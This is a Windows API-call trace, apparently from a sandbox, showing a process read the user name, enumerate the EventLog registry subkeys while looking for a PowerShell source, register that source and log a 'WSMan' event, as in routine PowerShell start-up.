	[0301.539] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b7220e0, nSize=0x28d288 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x28d288) returned 0x1
	[0301.540] CoTaskMemFree (pv=0x1b7220e0) 
	[0301.541] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.541] GetUserNameW (in: lpBuffer=0x4b2780, pcbBuffer=0x28d2c8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x28d2c8) returned 1
	[0301.541] CoTaskMemFree (pv=0x4b2780) 
	[0301.553] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cfc8 | out: phkResult=0x28cfc8*=0x34c) returned 0x0
	[0301.553] RegQueryInfoKeyW (in: hKey=0x34c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.553] CoTaskMemFree (pv=0x0) 
	[0301.553] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.553] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x0, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.553] CoTaskMemFree (pv=0x4b2780) 
	[0301.553] CoTaskMemFree (pv=0x0) 
	[0301.553] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.553] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x1, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.553] CoTaskMemFree (pv=0x4b2780) 
	[0301.553] CoTaskMemFree (pv=0x0) 
	[0301.553] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.553] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x2, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.553] CoTaskMemFree (pv=0x4b2780) 
	[0301.553] CoTaskMemFree (pv=0x0) 
	[0301.553] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.553] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x3, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.554] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x4, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.554] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x5, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.554] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x6, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.554] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x7, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.554] RegEnumKeyExW (in: hKey=0x34c, dwIndex=0x8, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.554] CoTaskMemFree (pv=0x4b2780) 
	[0301.554] CoTaskMemFree (pv=0x0) 
	[0301.554] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x350) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.555] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x354) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.555] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x358) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.555] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x35c) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.555] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x360) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.555] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x364) returned 0x0
	[0301.555] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.556] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x368) returned 0x0
	[0301.556] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.556] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x36c) returned 0x0
	[0301.556] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.556] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x370) returned 0x0
	[0301.556] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x374) returned 0x0
	[0301.556] RegCloseKey (hKey=0x374) returned 0x0
	[0301.556] RegCloseKey (hKey=0x34c) returned 0x0
	[0301.557] RegCloseKey (hKey=0x370) returned 0x0
	[0301.560] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cfc8 | out: phkResult=0x28cfc8*=0x370) returned 0x0
	[0301.560] RegQueryInfoKeyW (in: hKey=0x370, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cf3c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf38, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cf3c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf38*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.560] CoTaskMemFree (pv=0x0) 
	[0301.560] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.560] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x0, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.560] CoTaskMemFree (pv=0x4b2780) 
	[0301.560] CoTaskMemFree (pv=0x0) 
	[0301.560] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.560] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x1, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.560] CoTaskMemFree (pv=0x4b2780) 
	[0301.560] CoTaskMemFree (pv=0x0) 
	[0301.560] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.560] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x2, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.560] CoTaskMemFree (pv=0x4b2780) 
	[0301.560] CoTaskMemFree (pv=0x0) 
	[0301.560] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x3, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x4, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x5, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x6, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x7, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.561] RegEnumKeyExW (in: hKey=0x370, dwIndex=0x8, lpName=0x4b2780, lpcchName=0x28cfc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28cfc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.561] CoTaskMemFree (pv=0x4b2780) 
	[0301.561] CoTaskMemFree (pv=0x0) 
	[0301.561] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x34c) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.562] RegOpenKeyExW (in: hKey=0x370, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x374) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.562] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x378) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.562] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x37c) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.562] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x380) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x380, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.562] RegOpenKeyExW (in: hKey=0x370, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x384) returned 0x0
	[0301.562] RegOpenKeyExW (in: hKey=0x384, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.563] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x388) returned 0x0
	[0301.563] RegOpenKeyExW (in: hKey=0x388, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.563] RegOpenKeyExW (in: hKey=0x370, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x38c) returned 0x0
	[0301.563] RegOpenKeyExW (in: hKey=0x38c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x0) returned 0x2
	[0301.563] RegOpenKeyExW (in: hKey=0x370, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x390) returned 0x0
	[0301.563] RegOpenKeyExW (in: hKey=0x390, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28d028 | out: phkResult=0x28d028*=0x394) returned 0x0
	[0301.563] RegCloseKey (hKey=0x394) returned 0x0
	[0301.563] RegCloseKey (hKey=0x370) returned 0x0
	[0301.564] RegCloseKey (hKey=0x390) returned 0x0
	[0301.564] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cf98 | out: phkResult=0x28cf98*=0x390) returned 0x0
	[0301.564] RegQueryInfoKeyW (in: hKey=0x390, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x28cf0c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf08, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x28cf0c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x28cf08*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.564] CoTaskMemFree (pv=0x0) 
	[0301.564] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.564] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x0, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x1, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x2, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x3, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x4, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x5, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.565] CoTaskMemFree (pv=0x4b2780) 
	[0301.565] CoTaskMemFree (pv=0x0) 
	[0301.565] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.565] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x6, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.566] CoTaskMemFree (pv=0x4b2780) 
	[0301.566] CoTaskMemFree (pv=0x0) 
	[0301.566] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.566] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x7, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.566] CoTaskMemFree (pv=0x4b2780) 
	[0301.566] CoTaskMemFree (pv=0x0) 
	[0301.566] CoTaskMemAlloc (cb=0x204) returned 0x4b2780
	[0301.566] RegEnumKeyExW (in: hKey=0x390, dwIndex=0x8, lpName=0x4b2780, lpcchName=0x28cf98, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x28cf98, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0301.566] CoTaskMemFree (pv=0x4b2780) 
	[0301.566] CoTaskMemFree (pv=0x0) 
	[0301.566] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x370) returned 0x0
	[0301.566] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0301.566] RegOpenKeyExW (in: hKey=0x390, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x394) returned 0x0
	[0301.566] RegOpenKeyExW (in: hKey=0x394, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0301.566] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x398) returned 0x0
	[0302.331] RegOpenKeyExW (in: hKey=0x398, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x39c) returned 0x0
	[0302.332] RegOpenKeyExW (in: hKey=0x39c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3a0) returned 0x0
	[0302.332] RegOpenKeyExW (in: hKey=0x3a0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3a4) returned 0x0
	[0302.332] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3a8) returned 0x0
	[0302.332] RegOpenKeyExW (in: hKey=0x3a8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.332] RegOpenKeyExW (in: hKey=0x390, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3ac) returned 0x0
	[0302.333] RegOpenKeyExW (in: hKey=0x3ac, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x0) returned 0x2
	[0302.333] RegOpenKeyExW (in: hKey=0x390, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3b0) returned 0x0
	[0302.333] RegOpenKeyExW (in: hKey=0x3b0, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x28cff8 | out: phkResult=0x28cff8*=0x3b4) returned 0x0
	[0302.333] RegCloseKey (hKey=0x3b4) returned 0x0
	[0302.333] RegCloseKey (hKey=0x390) returned 0x0
	[0302.333] RegCloseKey (hKey=0x3b0) returned 0x0
	[0302.336] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b8d0008
	[0302.863] ReportEventW (hEventLog=0x1b8d0008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2fd23c0*="WSMan", lpRawData=0x2fd2130) returned 1
	[0302.882] CoTaskMemAlloc (cb=0x104) returned 0x471920
